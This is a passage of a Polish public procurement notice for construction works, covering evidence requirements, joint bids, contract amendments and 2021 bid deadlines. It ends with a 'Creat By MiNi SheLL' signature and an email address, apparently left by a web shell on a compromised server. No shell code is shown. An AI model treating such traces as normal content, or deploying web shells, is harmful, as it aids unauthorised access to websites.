potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Wykaz robót budowlanych wykonanych nie wcześniej niż w<br/>okresieostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniemich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostaływykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonanenależycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumentysporządzoneprzez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca<br/>z przyczynniezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty -załącznik nr 3 do SWZ. - Wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówieniapublicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanierobotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresuwykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami –załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>InformacjioDziałalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Prawo<br/>zamówieńpublicznych,sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisywymagająwpisu do rejestru lub ewidencji. Jeżeli Wykonawca ma siedzibę lub miejsce<br/>zamieszkaniapozaterytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentu, składa dokument<br/>lubdokumentywystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania,potwierdzająceodpowiednio, że nie otwarto jego likwidacji, nie ogłoszono jego upadłości,<br/>jego aktywaminie zarządzalikwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jestzawieszonaani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej proceduryprzewidzianej wprzepisach miejsca wszczęcia tej procedury wystawiony nie<br/>wcześniej niż 3 miesiąceprzed jego złożeniem.6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania,nie wydajesię dokumentów, o których mowa w pkt. 13.5 SWZ lub gdy dokumenty<br/>te nie odnoszą się dowszystkichprzypadków wskazanych w SWZ, zastępuje się je odpowiednio w<br/>całości lub w częścidokumentemzawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osóbuprawnionychdo jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożonepod przysięgą,lub, jeżeli w kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania nie maprzepisów ooświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym,notariuszem,organem samorządu zawodowego lub gospodarczego<br/>właściwym ze względu na siedzibęlub miejscezamieszkania Wykonawcy. Wymagania dotyczące<br/>terminu wystawienia dokumentów lub oświadczeń są analogiczne jak w pkt. 13.5 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takimprzypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albodo<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. W przypadku Wykonawców wspólnie ubiegających się oudzielenie<br/>zamówienia, oświadczenia, o których mowa w Rozdziale XIII pkt. 13.1 SWZ, składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi<br/>wykonają<br/>poszczególni Wykonawcy. Oświadczenia i dokumenty potwierdzające brak podstaw do<br/>wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany w umowie mogą dotyczyć: 1) zmiany terminu wykonania zamówienia, 2) zmiany ilości<br/>robót budowlanych, szczegółowo opisane w §4 ust. 3 - 6 niniejszej umowy 3) zmiany<br/>wynagrodzenia Wykonawcy, szczegółowo opisanej w §10 niniejszej umowy 4) zmiana w<br/>zakresie podwykonawstwa, szczegółowo opisana w § 8 niniejszej umowy, 5) zmian<br/>rozwiązańtechnicznych lub technologicznych, 6) zmian sposobu wykonania zamówienia, 7)<br/>zmiany<br/>producenta materiałów budowlanych, urządzeń, 8) zmiany wymiarów, położenia lub wysokości<br/>części robót budowlanych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com